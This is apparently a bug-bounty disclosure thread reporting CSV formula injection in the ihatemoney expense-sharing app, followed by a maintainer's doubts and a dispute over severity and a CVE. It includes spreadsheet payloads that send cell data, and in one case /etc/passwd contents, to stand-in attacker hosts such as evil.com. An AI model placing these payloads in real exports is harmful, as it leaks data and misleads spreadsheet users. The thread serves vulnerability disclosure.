Formula Injection/CSV Injection due to Improper Neutralization of Formula Elements in CSV File in spiral-project/ihatemoney
Reported on
May 7th 2022
Description
Formula Injection/CSV Injection in "For what?" , "For whom?" & "How much?" due to Improper Neutralization of Formula Elements in CSV File.
Proof of Concept
1.Visit https://ihatemoney.org/ and start your demo application then click on add new bill at the top right. In the field of "what" insert the below payloads.
2.Payloads:-
=HYPERLINK("http://evil.com?x="&A3&","&B3&"[CR]","Error fetching info: Click me to resolve.")
or
=HYPERLINK(CONCATENATE("http://attackerserver:port/a.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "poc") // & Start your python server or Netcat listener.
3.Then Go to the settings at the right top option and scroll to the bottom having download the project's data feature
4.Select "CSV" in "Format" to download.
5 . Open the downloaded CSV and click on POC and Error fetching info: Click me to resolve. user will get redirected to evil.com.
PoC video
https://drive.google.com/file/d/1ApQhaTIazCqZw1E8i3lOCV4IKkgNBX49/view?usp=sharing
Impact
Successful exploitation can lead to impacts such as client-sided command injection, code execution, or remote ex-filtration of contained confidential data.
I tried this and the output CSV contained:
"=LIEN.HYPERTEXTE(""http://evil.com?x=""; ""hello"")"
"=HYPERLINK(""http://evil.com?x=""&A3&"",""&B3&""[CR]"",""Error fetching info: Click me to resolve."")"
Formulae don't trigger any link in LibreOffice nor in Calligra.
I even tried with =ACOS(0,12) and opening it in LibreOffice results in the formula text being shown. In Calligra, the cell is displayed empty.
I don't have any other spreadsheet editor to test, but I guess that this is related to CSV loading in Google Docs, so for me, it's invalid.
Hi, @admin @maintainer it's completely working as I have tested it in LibreOffice. So attaching the zip file containing CSV file and POC video performed in LibreOffice https://drive.google.com/file/d/19eP60acGZYvXBU2hWjzFFOWpDqOrQOj1/view?usp=sharing Please recheck and confirm as it's working in LibreOffice and Google Excel sheet.
Here you can see both payload =7+7 and =HYPERLINK("http://evil.com","Click for Report") working fine
=7+7
=HYPERLINK("http://evil.com","Click for Report")
OK, so as shown in https://plik.root.gg/file/Lx42qjil4dwYIE1J/Y1mJEF00TuXbYNwS/Peek%2008-05-2022%2016-30.mp4 I've had "Evaluate formulae" unchecked, but I don't know if it was the default. However, is there a standard way to escape formulae in exported CSV?
@maintainer It seems like it's not working with "LibreOffice 7.3.3.2", it seems like LibreOffice has applied some security major about CSV injection for this version. But other versions are still executing like just showed in the POC video which is by default in ubuntu 20.04 (most recommended Linux) as the application is working as an agent. Please check this Reference report for further impact. Reference Report
However, I'm not sure about such feature of "Evaluate formulae" as I haven't changed anything. But as it's also executing in google excel, So application is surely vulnerable.
For standard way to escape formulae in exported CSV, please check the provided reference report. They have validated the report and applied the fixes as well.
@maintainer @admin Can you please go ahead and assign a CVE for this vulnerability.
Also @admin @maintainer The Severity of this report is not low you can see here it mentioned https://nvd.nist.gov/vuln/detail/CVE-2022-22121 Base Score: 8.0 HIGHVector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
We do not currently automatically assign CVEs against Low or None reports. If the maintainer provides us with a CVSS vector string, we will happily assign and publish a CVE.
The severity assessment is solely up to the maintainer, and we do not take a position on this.